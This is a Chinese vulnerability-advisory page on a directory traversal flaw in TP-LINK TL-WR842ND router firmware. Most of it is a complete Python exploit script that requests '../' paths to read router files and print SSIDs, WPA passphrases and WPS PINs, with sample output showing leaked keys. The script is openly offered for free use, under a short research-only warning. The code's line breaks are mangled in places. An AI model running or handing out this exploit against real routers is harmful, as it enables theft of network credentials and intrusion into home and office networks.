Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / TP-LINK TL-WR842ND目录遍历漏洞

发布日期:2013-05-29
更新日期:2013-05-30受影响系统:
TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632
 TP-LINK TL-WR842ND
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60206
 
TP-LINK TL-WR842ND是无线宽带路由器产品。TP-LINK TL-WR842ND 3.12.22 Build 120424 Rel.39632n及其他版本存在目录遍历漏洞,远程攻击者可利用此漏洞获取敏感信息。
 
<*来源:Adam Simuntis
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python """
 TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
 Adam Simuntis :: http://unixjail.com If remote management is on you have full access to router configuration - if not and you"re connected
 to router network you can discover another configured SSID"s. 
 Successfully tested against TP-LINK WR842ND
 Firmware Version: 3.12.22 Build 120424 Rel.39632n Feel free to use, modify and distribute. .-(~)---------------------------------------------------------------------------------(adam@ninja)-
 `--> python2 e.py ip:port
 TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit
 Adam Simuntis :: http://unixjail.com :: Crafting and sending evil request.. -> ssid="some_network"
    !wps_default_pin=01010101
    !wpa_passphrase="secretpsk"
 :: Search for another networks? (y/n)
 > y :: Searching.. :: Jumping for SSID 1.. -> ssid="another_network"
    !wps_default_pin=01010101
    !wpa_passphrase="another_secretpsk" :: Jumping for SSID 2..
 :: Jumping for SSID 3..
 :: Jumping for SSID 4.. .-(~)---------------------------------------------------------------------------------(adam@ninja)-
 `--> """ import requests,sys,socket
 from time import sleep data=""
 data2=""
 url=""W  = "33[0m"
R  = "33[31m"
 B  = "33[34m" #KISS
 def parse_data(text):
   words = text.split()       for word in words :
       if "ssid" in word and "ignore" not in word :
           print W+"-> "+B+"%s" %(word)
               if "pass" in word :
                       print W+" !"+R+"%s" %(word)
       if "default_pin" in word :
           print W+" !"+R+"%s" %(word)
   print W def make_url(host,n):
      junk = ("http://%s/help/../../../../../../../../../../../../../../../../tmp/ath%s.ap_bss") % (host,n)
      return junk if len(sys.argv) == 1 :
   print "Usage: %s router_ip:port (default port=80)" %(sys.argv[0])
   sys.exit() url = make_url(sys.argv[1],0) if ":" in sys.argv[1] :
   host = sys.argv[1].split(":")
 else :
   host = sys.argv[1] headers={
 "Host" : host[0],
 "User-Agent" : "Mozzila/5.0",
 "Referer" : "http://"+host[0]+"/" 
 } print "TP-LINK WR842ND Remote Multiple SSID Directory Travesal Exploit"
 print "Adam Simuntis :: http://unixjail.com " try:
   print R+":: Crafting and sending evil request.."
   print W
   data = requests.get(url,headers=headers).content except requests.ConnectionError, e:
    print R+":! Connection error! "
    sys.exit() if data :
   parse_data(data)
 else :
   print B+":! Ups.. seems to be not vulnerable"
   print W print " :: Search for another networks? (y/n)"
 answer = raw_input("> ") if answer=="y" or answer=="Y" :
   print R+" :: Searching.."
   print W   for i in range(1,5) :       print W+":: Jumping for SSID %s.. " %(i)       sleep(3)
         
        url = make_url(sys.argv[1],i)
       data2 = requests.get(url,headers=headers).content       if data2 :
           parse_data(data2)
       else :
           print B+"-> Nothing.. "
             
else :
   print W+" :: Bye!"
         
print建议:
--------------------------------------------------------------------------------
厂商补丁:
 
TP-LINK
 -------
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.tp-link.com/en/support/download/Sleipnir Mobile for Android地址栏欺骗漏洞(CVE-2013-2317)MayGion IP Camera 远程缓冲区溢出漏洞(CVE-2013-1605)相关资讯      TP-LINK 
  • TP-Link与FCC和解,允许路由器安装  (08月02日)
  • TP-Link将禁止安装第三方开源固件  (03月12日)
  • Google与TP-LINK推出无线路由器  (08/19/2015 11:46:19)
  • TP-LINK失去了两个设备配置域名的  (07月06日)
  • TP-Link开始锁定路由器固件禁止安  (02月19日)
  • 多个TP-Link路由器RomPager拒绝服  (06/17/2014 18:47:44)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款